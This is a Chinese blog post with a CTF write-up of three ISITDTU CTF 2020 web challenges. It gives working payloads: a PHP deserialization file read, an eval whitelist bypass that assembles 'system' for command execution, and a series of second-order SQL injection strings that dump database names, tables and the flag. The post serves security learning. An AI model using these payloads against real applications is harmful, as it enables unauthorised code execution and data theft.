周末,跟着m3w师傅打ISITDTUCTF,m3w师傅带弟弟上分,Tql!

Web1

给了源码:

<?php
class Read{
public $flag;
public function __wakeup(){
echo file_get_contents($this->flag);
}
}
if(isset($_GET['username'])){
if(isset($_GET['password']))
{
$password = $_GET['password'];
unserialize($password);
}
}
highlight_file(__FILE__);
?>

考点:找flag文件+反序列化+文件包含

后面的利用很快就构造好了,利用类反序列化时触发__wakeup魔术方法,将flag文件包含进去。

Payload.php

<?php
class Read{
public $flag = 'index.php';
}
$a = new Read();
echo serialize($a);
?>

不过flag文件一直找不到,尝试了几个常用的地方也没有。后来发现还有存在一个robots.txt的文件,其中给了flag为fl4g.php

Payload:?username&password=O:4:"Read":1:{s:4:"flag";s:8:"fl4g.php";},查看源码即可。

Web2

还是给出了源码:

<?php

    // error_reporting(E_ALL);
// ini_set('display_errors', '1'); function trigonometric_check($code) { // Check length
if (strlen($code) >= 0x100) {
return false;
} // Trim code
$code = preg_replace("/(\\s|\\r|\\n|\\t)/", " ", $code); // Danger keyword
$blacklist = array("`", "\\$", "include", "require", "#");
foreach ($blacklist as $b) {
if(preg_match("/($b)/i", $code, $m)) {
return false;
}
} // Fillter function
preg_match_all("/([a-zA-Z]+)[\\s\\t\\r\\n\/\*]*\(/", $code, $match);
$trigonometric_functions = array("sin", "asin", "cos", "acos", "tan", "atan"); // Missing trigonometric function
if (count($match[1]) === 0) {
return false;
} // Only trigonometric function
foreach($match[1] as $func) {
if (!in_array($func, $trigonometric_functions)) {
return false;
}
} return true;
} function trigonometric($code) {
if (!trigonometric_check($code)) {
echo "Error!";
return;
}
echo eval("echo ".$code.";");
} $input = $_POST["input"]; if (!isset($input)) {
highlight_file(__FILE__);
exit;
} trigonometric($input);
?>

通过查看源码,进行了四层过滤,分别是:对长度进行限制、将一些转义的特殊字符置空,过滤一份黑名单,一份可用函数的白名单。

想了很久,没有思路,这时候m3w师傅给了一串字符串:(''.[])[sin(0)],找到了A,然后通过测试发现对字符串加入内容,可以返回第一个字符,如('b')[sin(0)]——>b,通过这个方法就可以拼接字符串,然后getshell了

Payload:input=((("s")[sin(0)]).(("y")[sin(0)]).(("s")[sin(0)]).(("t")[sin(0)]).(("e")[sin(0)]).(("m")[sin(0)]))((("n")[sin(0)]).(("l")[sin(0)]).((" ")[sin(0)]).(("*")[sin(0)]))

对(''.[])[sin(0)]的思考:

拆成两个部分:''.[]和[sin(0)]

前半部分是通过强转换的方式将''和[]进行拼接,[]会变成Array,而前面是空字符,所以拼接完之后的字符串是Array

后半部分sin(0)取值是0,所以是[0]

两个拼接起来后就是取了A,有一种C语言字符串取值的感觉了,最后优化一下,可以改成:'A'[sin(0)]

后来,Firebasky师傅问了一个"ab"[[0]]为啥输出的是b,测试一下:

$a = array();
$b = array('1');
var_dump("abc"[$a]);
var_dump("abc"[$b]);
#输出
string(1) "a"
string(1) "b" var_dump("abc"[[]]);
var_dump("abc"[[0]]);
#输出
string(1) "a"
string(1) "b"

如果[]中是数组且有值的,那就会转成"abc"[1];而如果[]中是数组但没有值的,那就会转成"abc"[0]。因为自己水平有限,实在无法继续向下分析了,只能当个trick记住了,5555~,要是有懂的师傅请指点一下我!

Web3 child sql

有三个页面,分别是login.php、register.php、index.php(需要登陆了才看得到)

一开始找注入点,就毫无头绪。在登陆和注册页面疯狂尝试,无果。m3w师傅又来提醒我了,说是二次注入回显在index.php界面。发现了注入点在注入页面的用户名上。其实自己应该发现的,因为当时曾经用了username = "atao' or 1#"但是返回的不是atao而是1111,还以为是网站的问题,原来是菜蒙蔽了双眼。

Payload

判断列数:atao' order by 1#

回显库名:-1' union select database()#

回显表名:-1' union select group_concat(table_name) from information_schema.tables where table_schema= database()#

回显列名:-1' union select group_concat(column_name) from information_schema.columns where table_schema= database() and table_name='flag'#

回显数据:-1' union select flag from flag#

注:邮箱需要一直换一下

另外两题Web,一个是Powershell的trick,还有一个好像环境有问题。要是啥时候能用了在复现一下。周末又是膜m3w师傅!!!感谢大师傅带我打比赛。

本文作者:erR0Ratao

本文链接:https://www.cnblogs.com/erR0Ratao/p/13801674.html

ISITDTU CTF 2020 部分Web题目Writeup的更多相关文章

  1. jarvis OJ WEB题目writeup

    0x00前言 发现一个很好的ctf平台,题目感觉很有趣,学习了一波并记录一下 https://www.jarvisoj.com 0x01 Port51 题目要求是用51端口去访问该网页,注意下,要用具 ...

  2. CTF实验吧-WEB题目解题笔记(1)简单的登陆题

    1.简单的登陆题 解题链接: http://ctf5.shiyanbar.com/web/jiandan/index.php  Burp抓包解密 乱码,更换思路.尝试id intruder 似乎也没什 ...

  3. 三叶草极客大挑战2020 部分题目Writeup

    三叶草极客大挑战2020 部分题目Writeup Web Welcome 打开后状态码405,555555,然后看了一下报头存在请求错误,换成POST请求后,查看到源码 <?php error_ ...

  4. 2020年第二届“网鼎杯”网络安全大赛 白虎组 部分题目Writeup

    2020年第二届“网鼎杯”网络安全大赛 白虎组 部分题目Writeup 2020年网鼎杯白虎组赛题.zip下载 https://download.csdn.net/download/jameswhit ...

  5. XCTF攻防世界Web之WriteUp

    XCTF攻防世界Web之WriteUp 0x00 准备 [内容] 在xctf官网注册账号,即可食用. [目录] 目录 0x01 view-source2 0x02 get post3 0x03 rob ...

  6. 31C3 CTF web关writeup

    0x00 背景 31c3 CTF 还是很人性化的,比赛结束了之后还可以玩.看题解做出了当时不会做的题目,写了一个writeup. 英文的题解可以看这:https://github.com/ctfs/w ...

  7. ctf题目writeup(7)

    2019.2.10 过年休息归来,继续做题. bugku的web题,地址:https://ctf.bugku.com/challenges 1. http://123.206.87.240:8002/ ...

  8. ctf题目writeup(4)

    2019.1.31 题目:这次都是web的了...(自己只略接触隐写杂项web这些简单的东西...) 题目地址:https://www.ichunqiu.com/battalion 1. 打开链接: ...

  9. ctf题目writeup(9)

    继续刷题,找到一个 什么 蓝鲸安全的ctf平台 地址:http://whalectf.xin/challenges (话说这些ctf平台长得好像) 1. 放到converter试一下: 在用十六进制转 ...

随机推荐

  1. 爬虫学习之-scrapy交互式命令 scrapy查看页面

    scrapy shell https:///www.baidu.com  会启动爬虫请求网页 view(response) 会在浏览器打开请求到的临时文件 response.xpath("/ ...

  2. JAVA递归实现线索化二叉树

    JAVA递归实现线索化二叉树 基础理论 首先,二叉树递归遍历分为先序遍历.中序遍历和后序遍历. 先序遍历为:根节点+左子树+右子树 中序遍历为:左子树+根节点+右子树 后序遍历为:左子树+右子树+根节 ...

  3. java刷题时常用容器详解

    当初学java时,只是简单的把java基础知识过了一遍就跑去刷题了,很多知识都是在刷题的过程中慢慢加深理解的. 由于每次刷题时,刷到与容器有关的我基本上都跑去百度了,例如百度一下:java中List的 ...

  4. Redis中的跳表

    date: 2020-10-15 14:58:00 updated: 2020-10-19 17:58:00 Redis中的跳表 参考网址1 参考网址2 redis 数据类型 zset 实现有序集合, ...

  5. java数据结构-08队列

    一.什么是队列 队列是一种特殊的线性表,只能在头尾两端进行操作,特点是先进先出:就像排队买票一样,先来的先买 二.接口设计  三.代码实现 可以使用动态数组.链表等实现:这里两种实现栈与双向链表 1. ...

  6. 【论文阅读】An Empirical Study of Architectural Decay in Open-Source Software

    2020-06-19这篇文章是我学习 软件架构与中间件 课程时分享的论文.可以说,这篇文章塑造了我基本的科研观,也养成了我如今看论文的习惯.感谢老师们,也感谢恒恒对我的帮助. 论文地址: https: ...

  7. 一起学Vue:UI框架(element-ui)

    目标 使用Vue+ElementUI构建一个非常简单CRUD应用程序,以便您更好地了解它的工作方式. 效果页面 比如我们要实现这样列表.新增.编辑三个页面: 列表页面 新增页面 编辑页面 安装elem ...

  8. 一起学Vue:路由(vue-router)

    前言 学习vue-router就要先了解路由是什么?前端路由的实现原理?vue-router如何使用?等等这些问题,就是本篇要探讨的主要问题. vue-router是什么 路由是什么? 大概有两种说法 ...

  9. STM32入门系列-启动文件介绍

    在启动文件内部使用的都是汇编语言,这个文件的作用是负责执行微控制器从"复位"到"开始执行 main 函数"中间这段启动时间所必须进行的工作.它完成的具体工作有: ...

  10. Java学习的第三十三天

    1.今天复习了第十二章的12.1的文件和12.2一直到12.2.4 2.没有问题 3.明天继续复习